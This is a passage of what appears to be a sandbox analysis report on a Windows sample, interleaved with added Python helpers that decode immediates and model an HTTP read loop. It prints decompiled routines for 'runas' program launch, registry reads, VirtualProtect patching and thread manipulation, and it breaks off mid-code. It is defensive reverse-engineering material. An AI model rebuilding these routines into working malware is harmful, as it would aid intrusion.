                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00DD5B7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                            • String ID: ($\
                                                            • API String ID: 3924217599-1512714803
                                                            • Opcode ID: 4ce1313a263248b3f9095ef7b0f2f67709988726bf36164c8ddc28dba338db19
                                                            • Instruction ID: 95537921de73ef572040a739292a1ce4f0a506b27d2bf4b3013982140bb7e021
                                                            • Opcode Fuzzy Hash: 4ce1313a263248b3f9095ef7b0f2f67709988726bf36164c8ddc28dba338db19
                                                            • Instruction Fuzzy Hash: CA516B3510060ABFDF219FA8EC41EAA3BBAEF08310F148517FA1596225D736D925EF31
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
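The immediates in E00DD5AFA only make sense once decoded: 0x80000002 and 0x80000003 are the predefined root handles HKEY_LOCAL_MACHINE and HKEY_USERS, and the dwords the decompiler prints as comments are four ASCII bytes in little-endian order (0x4d4c4b48 is "HKLM", 0x55434b48 "HKCU", 0x74666f53 "Soft"). The Python below is an added example, written for this edit and not part of the Joe Sandbox report or of the sample, that pulls hex immediates out of a decompiled listing and labels each one as a registry root, an ASCII fragment, or a UTF-16 fragment. It also covers the two-character wide-string prefixes of the kind that appear in E00DD1697 further down (0x70006f is L"op", 0x750072 is L"ru"); that generalisation and the five-digit minimum used to skip small structure offsets are assumptions of this example, and the sample listing is constructed from lines copied out of the two functions.

```python
import re
import struct

# Predefined registry root handles (winreg.h). 0x80000002 and 0x80000003 are the
# two values the decompiled E00DD5AFA loads into _t91.
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA",
    0x80000005: "HKEY_CURRENT_CONFIG",
}


def _ascii_only(s):
    return bool(s) and all(0x20 <= ord(ch) < 0x7F for ch in s)


def dword_to_ascii(value):
    """The 4 bytes a 32-bit immediate occupies in memory (little-endian), if all are printable ASCII."""
    s = struct.pack("<I", value).decode("latin-1")
    return s if _ascii_only(s) else None


def dword_to_utf16(value):
    """The same 4 bytes read as two UTF-16LE code units, if both are printable ASCII
    (the first two characters of a wide string, as in 0x70006f -> 'op')."""
    s = struct.pack("<I", value).decode("utf-16-le", errors="replace")
    return s if _ascii_only(s) else None


def decode_immediate(value):
    """Best-effort meaning of one immediate: registry root, ASCII fragment, or wide fragment."""
    if value in HKEY_ROOTS:
        return HKEY_ROOTS[value]
    s = dword_to_ascii(value)
    if s is not None:
        return f'"{s}"'
    w = dword_to_utf16(value)
    if w is not None:
        return f'L"{w}"'
    return None


# Assumption: immediates shorter than five hex digits are structure offsets (0x10, 0x28 ...)
# and are not worth decoding.
IMM_RE = re.compile(r"0x[0-9a-fA-F]{5,8}")


def annotate_listing(listing):
    """Map every decodable hex immediate in a decompiled listing to its meaning."""
    found = {}
    for m in IMM_RE.finditer(listing):
        meaning = decode_immediate(int(m.group(0), 16))
        if meaning is not None:
            found[m.group(0).lower()] = meaning
    return found


# Constructed sample: lines copied from the decompiled E00DD5AFA and E00DD1697.
SAMPLE_LISTING = """\
_t91 = 0x80000002;
_t35 = _t68 + 0xddb9ef; // 0x4d4c4b48
_t34 = _t68 + 0xddb907; // 0x55434b48
_t44 = _t71 + 0xddb892; // 0x74666f53
_t91 = 0x80000003;
_t7 = _t22 + 0xddb4e0; // 0x70006f
_t6 = _t22 + 0xddb90c; // 0x750072
"""

if __name__ == "__main__":
    for imm, meaning in annotate_listing(SAMPLE_LISTING).items():
        print(f"{imm} -> {meaning}")
```

The address-sized immediates such as 0xddb9ef decode to nothing and are skipped, which is the behaviour wanted: only the comment values (the bytes the decompiler saw at those addresses) carry string content.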

                                                            C-Code - Quality: 32%
                                                            			// Launches a program through the dynamically resolved import at 0xdda100 using a 0x3c-byte
                                                            			// structure. 0x3c (60) is sizeof(SHELLEXECUTEINFO) on x86 and the fields filled below sit at
                                                            			// that structure's offsets (lpVerb +12, lpFile +16, lpParameters +20, nShow +28), so the
                                                            			// unresolved call is consistent with ShellExecuteEx; this is an inference from the layout,
                                                            			// the report does not name the import. The verb is chosen by _a8: 0x70006f is UTF-16 "op",
                                                            			// 0x750072 is UTF-16 "ru", the first two characters of the respective wide strings
                                                            			// (consistent with "open" and "runas", but only the first dword is visible here).
                                                            			E00DD1697(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				void _v60;
                                                            				char _v64;
                                                            				long _t18;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t23;
                                                            				long _t29;
                                                            				intOrPtr _t30;
                                                            				intOrPtr _t31;
                                                            				intOrPtr* _t32;
                                                            
                                                            				_t30 = __edi;
                                                            				_t29 = _a4;
                                                            				_t31 = __eax;
                                                            				_t18 = E00DD19B4(_t29, __edi, __eax); // executed
                                                            				_a4 = _t18;
                                                            				if(_t18 != 0) {
                                                            					memset( &_v60, 0, 0x38); // zero the 0x38 bytes that follow cbSize
                                                            					_t22 =  *0xdda2d4; // 0x2bed5a8
                                                            					_v64 = 0x3c; // cbSize = 60
                                                            					if(_a8 == 0) {
                                                            						_t7 = _t22 + 0xddb4e0; // 0x70006f = L"op"
                                                            						_t23 = _t7;
                                                            					} else {
                                                            						_t6 = _t22 + 0xddb90c; // 0x750072 = L"ru"
                                                            						_t23 = _t6;
                                                            					}
                                                            					_v36 = _t31; // +28: show command, taken from eax
                                                            					_t32 = __imp__; // unresolved import, called with 0 before and 1 after the launch
                                                            					_v52 = _t23; // +12: verb
                                                            					_v48 = _t29; // +16: file, the original _a4
                                                            					_v44 = _t30; // +20: parameters, from edi
                                                            					 *_t32(0);
                                                            					_push( &_v64);
                                                            					if( *0xdda100() != 0) {
                                                            						_a4 = _a4 & 0x00000000; // launched: report success
                                                            					} else {
                                                            						_a4 = GetLastError();
                                                            					}
                                                            					 *_t32(1);
                                                            				}
                                                            				return _a4; // 0 on success (or when E00DD19B4 returned 0), otherwise the Win32 error code
                                                            			}
                                                            Instruction addresses, one per decompiled line above in listing order:
                                                            0x00dd1697 0x00dd169e 0x00dd16a2 0x00dd16a7 0x00dd16ae 0x00dd16b1 0x00dd16bb 0x00dd16c0
                                                            0x00dd16cc 0x00dd16d3 0x00dd16dd 0x00dd16dd 0x00dd16d5 0x00dd16d5 0x00dd16d5 0x00dd16d5
                                                            0x00dd16e3 0x00dd16e6 0x00dd16ee 0x00dd16f1 0x00dd16f4 0x00dd16f7 0x00dd16fc 0x00dd1705
                                                            0x00dd1712 0x00dd1707 0x00dd170d 0x00dd170d 0x00dd1718 0x00dd1718
                                                            0x00dd1720

                                                            APIs
                                                              • Part of subcall function 00DD19B4: SysAllocString.OLEAUT32(?), ref: 00DD1A10
                                                              • Part of subcall function 00DD19B4: SysAllocString.OLEAUT32(0070006F), ref: 00DD1A24
                                                              • Part of subcall function 00DD19B4: SysAllocString.OLEAUT32(00000000), ref: 00DD1A36
                                                              • Part of subcall function 00DD19B4: SysFreeString.OLEAUT32(00000000), ref: 00DD1A9A
                                                            • memset.NTDLL ref: 00DD16BB
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DD16F7
                                                            • GetLastError.KERNEL32 ref: 00DD1707
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DD1718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                            • String ID: <
                                                            • API String ID: 593937197-4251816714
                                                            • Opcode ID: d503d70233bf99e50eeb4c92da005a73463adf1ebe8a2c27f8a2b230fb6f33f9
                                                            • Instruction ID: 756382740fec501889fc2bea51a6da16d96fafc7e57fbdcc841626c6d8048238
                                                            • Opcode Fuzzy Hash: d503d70233bf99e50eeb4c92da005a73463adf1ebe8a2c27f8a2b230fb6f33f9
                                                            • Instruction Fuzzy Hash: FA111275900218BBDB10EFA9D885BAA7BB8EB08394F04802BF905E7291D774E5448BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045821CB: VirtualProtect.KERNELBASE(0457C495,?,00000040,?,0458B7A4,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000), ref: 045821F0
                                                              • Part of subcall function 045821CB: GetLastError.KERNEL32(?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 045821F8
                                                              • Part of subcall function 045821CB: VirtualQuery.KERNEL32(0457C495,0458B7A4,0000001C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458220F
                                                              • Part of subcall function 045821CB: VirtualProtect.KERNEL32(0457C495,?,-2C9B417C,?,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 04582234
                                                            • GetLastError.KERNEL32(00000000,00000004,0456A09A,?,810C74FC,00000000,?,04588560,0000001C,04569E36,00000002,0457C495,00000001,0000000C,0458B7A0,0000000C), ref: 045705C5
                                                              • Part of subcall function 0456FB2B: lstrlen.KERNEL32(0458B620,0458B7A4,00000402,0458B7A4), ref: 0456FB63
                                                              • Part of subcall function 0456FB2B: lstrcpy.KERNEL32(00000000,0458B620), ref: 0456FB7A
                                                              • Part of subcall function 0456FB2B: StrChrA.SHLWAPI(00000000,0000002E), ref: 0456FB83
                                                              • Part of subcall function 0456FB2B: GetModuleHandleA.KERNEL32(00000000), ref: 0456FBA1
                                                            • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,0457C495,?,0458B620,0457C495,?,00000000,00000004,0456A09A,?,810C74FC), ref: 04570543
                                                            • VirtualProtect.KERNELBASE(0458B7A4,00000004,0456A09A,0456A09A,0457C495,?,00000000,00000004,0456A09A,?,810C74FC,00000000,?,04588560,0000001C,04569E36), ref: 0457055E
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 04570582
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 045705A0
                                                              • Part of subcall function 045821CB: SetLastError.KERNEL32(0000000C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458223D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 899430048-0
                                                            • Opcode ID: b9c3989943b469f9c4023eed038182c5c04b619eedaa52840778f33d74c519d5
                                                            • Instruction ID: df55c14e24650f00cde724d7b0320801a5e631c867461fc5f2c4910dcd54f193
                                                            • Opcode Fuzzy Hash: b9c3989943b469f9c4023eed038182c5c04b619eedaa52840778f33d74c519d5
                                                            • Instruction Fuzzy Hash: C7416F7190061AEFDB11DF65E844AADBBF4FF49710F048119E915AB290DB34F940EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD43C6(signed int _a4, signed int* _a8) {
                                                            				void* __ecx;
                                                            				void* __edi;
                                                            				signed int _t6;
                                                            				intOrPtr _t8;
                                                            				intOrPtr _t12;
                                                            				long _t14;
                                                            				void* _t18;
                                                            				long _t21;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				signed int* _t27;
                                                            				signed short* _t28;
                                                            				CHAR* _t30;
                                                            				long _t31;
                                                            				WCHAR** _t32;
                                                            
                                                            				_t6 =  *0xdda2c8; // 0xbd092303
                                                            				_t32 = _a4;
                                                            				_a4 = _t6 ^ 0xd05b5869;
                                                            				_t8 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t3 = _t8 + 0xddb84d; // 0x61636f4c
                                                            				_t25 = 0;
                                                            				_t30 = E00DD3971(_t3, 1);
                                                            				if(_t30 != 0) {
                                                            					_t25 = CreateEventA(0xdda2f8, 1, 0, _t30);
                                                            					E00DD77EC(_t30);
                                                            				}
                                                            				_t12 =  *0xdda2b4; // 0x2000000a
                                                            				if(_t12 != 6 || _t12 < 2) {
                                                            					if( *_t32 == 0) {
                                                            						goto L11;
                                                            					}
                                                            					_t18 = E00DD11B8(); // executed
                                                            					if(_t18 != 0) {
                                                            						goto L11;
                                                            					}
                                                            					_t28 = StrChrW( *_t32, 0x20);
                                                            					if(_t28 != 0) {
                                                            						 *_t28 =  *_t28 & 0x00000000;
                                                            						_t28 =  &(_t28[1]);
                                                            					}
                                                            					_t21 = E00DD1697(0, _t28,  *_t32, 0); // executed
                                                            					_t31 = _t21;
                                                            					if(_t31 == 0) {
                                                            						if(_t25 == 0) {
                                                            							goto L21;
                                                            						}
                                                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                            						if(_t31 == 0) {
                                                            							goto L19;
                                                            						}
                                                            					}
                                                            					goto L11;
                                                            				} else {
                                                            					L11:
                                                            					_t27 = _a8;
                                                            					if(_t27 != 0) {
                                                            						 *_t27 =  *_t27 | 0x00000001;
                                                            					}
                                                            					_t14 = E00DD4BD9(_t32, _t26); // executed
                                                            					_t31 = _t14;
                                                            					if(_t31 == 0 && _t25 != 0) {
                                                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                            					}
                                                            					if(_t27 != 0 && _t31 != 0) {
                                                            						 *_t27 =  *_t27 & 0xfffffffe;
                                                            					}
                                                            					L19:
                                                            					if(_t25 != 0) {
                                                            						CloseHandle(_t25);
                                                            					}
                                                            					L21:
                                                            					return _t31;
                                                            				}
			}

                                                            APIs
                                                              • Part of subcall function 00DD3971: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,039C9D00,745EC740,00DD5FB9,?,69B25F44,E8FA7DD7,00000000,?,?,?,00DD5FB9), ref: 00DD39A7
                                                              • Part of subcall function 00DD3971: lstrcpy.KERNEL32(00000000,00000000), ref: 00DD39CB
                                                              • Part of subcall function 00DD3971: lstrcat.KERNEL32(00000000,00000000), ref: 00DD39D3
                                                            • CreateEventA.KERNEL32(00DDA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD4405
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • StrChrW.SHLWAPI(00DD17D2,00000020,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD4435
                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,00DD17D2,00000000,?,00000000,?,00DD17D2,?,?,?,?,?,?,?,00DD6E29), ref: 00DD4463
                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD4491
                                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DD17D2,?,?,?), ref: 00DD44A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 73268831-0
                                                            • Opcode ID: 1d80ab74325c930681260fee933b7d52d6f9559f31673eca03db83529b670bef
                                                            • Instruction ID: 1f4aae212a9130cf3c13331ca15d487989b9805b1ac5198d439367b58ff8c639
                                                            • Opcode Fuzzy Hash: 1d80ab74325c930681260fee933b7d52d6f9559f31673eca03db83529b670bef
                                                            • Instruction Fuzzy Hash: 2E21C7326023126BD7315BA99C45B6AB7D8EF84765F094227FE41EB391DBB1DC8086B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                            • RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                            • HeapFree.KERNEL32(00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576934
                                                            • RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                            • String ID:
                                                            • API String ID: 1633053242-0
                                                            • Opcode ID: ee1a90adb8cf0012410a31520ed50e0bff20dca8bc1c4b1dd219880243b1083b
                                                            • Instruction ID: e459a965c923badfad0a13bd37fffac60e1d046506a06de7529125632d5229dc
                                                            • Opcode Fuzzy Hash: ee1a90adb8cf0012410a31520ed50e0bff20dca8bc1c4b1dd219880243b1083b
                                                            • Instruction Fuzzy Hash: 7F1128B6500109FFDF019F95EC84CAE7B7EFB88264B15042AF501A7211EB31AE55EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(0457C495,?,00000040,?,0458B7A4,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000), ref: 045821F0
                                                            • GetLastError.KERNEL32(?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 045821F8
                                                            • VirtualQuery.KERNEL32(0457C495,0458B7A4,0000001C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458220F
                                                            • VirtualProtect.KERNEL32(0457C495,?,-2C9B417C,?,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 04582234
                                                            • SetLastError.KERNEL32(0000000C,?,00000000,0458B7A4,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0458223D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtect$Query
                                                            • String ID:
                                                            • API String ID: 148356745-0
                                                            • Opcode ID: 00e4463b564436b58e792c512d57f05091985bcfc5dfbf221bffda691576d1ff
                                                            • Instruction ID: 44f1ccd7590aca15b009ffa02e4da5086f8630d8d05d35d068ac150ab9bc0ad3
                                                            • Opcode Fuzzy Hash: 00e4463b564436b58e792c512d57f05091985bcfc5dfbf221bffda691576d1ff
                                                            • Instruction Fuzzy Hash: 2F010C72500209EF9F11AF95DC4499EBBBDFF0C255B00446AF902E3121DB75EA14EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04561971
                                                            • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 045619FB
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04561A09
                                                            • SuspendThread.KERNELBASE(?), ref: 04561A1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                            • String ID:
                                                            • API String ID: 3168247402-0
                                                            • Opcode ID: fe4739c3daa6373aa63e24a0a71488db0f436f8c0884f577de176cffb2a8c149
                                                            • Instruction ID: 48d9395a66ab1a7c9c69efadbcb3aa757af9d24d555f89db2480996886578685
                                                            • Opcode Fuzzy Hash: fe4739c3daa6373aa63e24a0a71488db0f436f8c0884f577de176cffb2a8c149
                                                            • Instruction Fuzzy Hash: DF417FB1104702AFE721DF54D840E7BBBE9FF84354F044A2DFA9692160DB31E954EBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
			E00DD4182(void* __eax) {
				long _v8;       // status handed back to the caller
				char _v12;      // bytes the transport reports as pending
				char _v16;      // bytes actually delivered by the last read call
				intOrPtr _v20;  // 0x1000-byte heap buffer
				void* _v24;     // COM object the body is written into
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax; // context: +0x18 holds the request handle, +0x30 is cleared on the "nothing to read" paths
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // IAT call on the handle: how many bytes are pending (inferred from how _v12 is consumed below)
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) { // 12030, WinHTTP CONNECTION_ERROR / WinINet CONNECTION_ABORTED: the only failure tolerated on the first query
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0xdda144(0, 1,  &_v24); // executed; indirect call through a resolved pointer that yields the COM object in _v24
				if(_t44 != 0) {
					_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					goto L26;
				}
				_t45 = E00DD77D7(0x1000); // heap allocation (wraps RtlAllocateHeap, see APIs): the 4 KiB read buffer
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46); // vtable slot +8: IUnknown::Release
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000; // never ask for more than the buffer holds in one call
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16); // IAT call: read up to _t48 bytes into the buffer, count returned in _v16
						if(_t48 == 0) { // _t48 now carries the call's return value (decompiler register reuse): the read failed
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0); // vtable slot +0x10 called as (this, buffer, count, NULL); matches IStream::Write
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue; // part of the reported bytes still to be read
						}
						L10:
						if(WaitForSingleObject( *0xdda2c4, 0) != 0x102) { // non-blocking poll of a global event; anything but WAIT_TIMEOUT means it is signalled
							_v8 = 0x102; // the abort is reported with the WAIT_TIMEOUT value itself
							L18:
							E00DD77EC(_v20); // free the read buffer
							if(_v8 == 0) {
								_t52 = E00DD44D1(_v24, _t64); // executed; the collected body is handed on only when no error was recorded
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed; ask again whether more bytes have arrived
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) { // 12152, INVALID_SERVER_RESPONSE: a clean end of body only if nothing was still pending
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError(); // the read call failed; the error is kept unless the re-query above clears it
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

                                                             Instruction-address column for E00DD4182 (the disassembly text itself did not survive extraction); the mapped addresses run from 0x00dd418a to 0x00dd42bf.

                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 00DD42A2
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • GetLastError.KERNEL32 ref: 00DD4216
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 00DD4226
                                                            • GetLastError.KERNEL32 ref: 00DD4246
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 35602742-0
                                                            • Opcode ID: bb4e6b106f17bb4e1151569b5b69f05a12801328944eb9a2fc648da3103fc061
                                                            • Instruction ID: 7b03e056d004cd57ede2719ae483079a3215793ca8b381db08afc13939d4e25c
                                                            • Opcode Fuzzy Hash: bb4e6b106f17bb4e1151569b5b69f05a12801328944eb9a2fc648da3103fc061
                                                            • Instruction Fuzzy Hash: 7C41F6B0901219EFDF209FE5D9849AEBBB9EB04345F24446BE902E6350E7319E44DB35
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
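
The read loop of E00DD4182, reconstructed in Python as an added editor's example; this is not code from the sample or from the report. The two IAT calls the decompiler shows only as __imp__ are modelled as WinHttpQueryDataAvailable and WinHttpReadData: that identification is an inference from the error codes the function special-cases (0x2EFE = 12030, the WinHTTP/WinINet CONNECTION_ERROR/CONNECTION_ABORTED value, and 0x2F78 = 12152, INVALID_SERVER_RESPONSE) and from the first call's output being used as a byte count for the second; the report does not name them. FakeRequest is a constructed, scripted transport, the COM stream at _v24 is modelled as a bytearray, and the per-response handler E00DD44D1 is not modelled (the function returns the bytes it would receive). The model keeps the listing's status edge cases: a connection error on the very first query is swallowed, INVALID_SERVER_RESPONSE with nothing pending is the normal end of body, any other failure on a re-query is returned, and a signalled stop event returns 0x102.

```python
"""Python model of the HTTP response read loop decompiled as E00DD4182.

Editor's added example, not code from the sample or the report. The two IAT
calls shown as __imp__ are modelled as WinHttpQueryDataAvailable and
WinHttpReadData; that identification is an inference from the error codes the
function handles, not something the report states.
"""

ERROR_NOT_ENOUGH_MEMORY = 8
WAIT_TIMEOUT = 0x102                    # also reused by the function as its abort status
ERROR_CONNECTION_ABORTED = 0x2EFE       # 12030: WinHTTP CONNECTION_ERROR / WinINet CONNECTION_ABORTED
ERROR_INVALID_SERVER_RESPONSE = 0x2F78  # 12152: WinHTTP / WinINet INVALID_SERVER_RESPONSE
CHUNK = 0x1000                          # size of the heap buffer E00DD77D7 hands back


class FakeRequest:
    """Constructed stand-in for the request handle kept at ctx+0x18.

    query_script: successive answers to query_data_available(); an int is a
    byte count, ("fail", code) makes that call fail with the given Win32 error.
    read_error: if set, every read_data() call fails with this code.
    """

    def __init__(self, body, query_script, read_error=None):
        self.body = body
        self.query_script = list(query_script)
        self.read_error = read_error
        self.last_error = 0
        self.offset = 0

    def query_data_available(self):
        """Models WinHttpQueryDataAvailable: (ok, bytes_pending)."""
        if not self.query_script:
            return True, 0
        step = self.query_script.pop(0)
        if isinstance(step, tuple):
            self.last_error = step[1]
            return False, 0
        return True, step

    def read_data(self, size):
        """Models WinHttpReadData: (ok, chunk)."""
        if self.read_error is not None:
            self.last_error = self.read_error
            return False, b""
        chunk = self.body[self.offset:self.offset + size]
        if size and not chunk:
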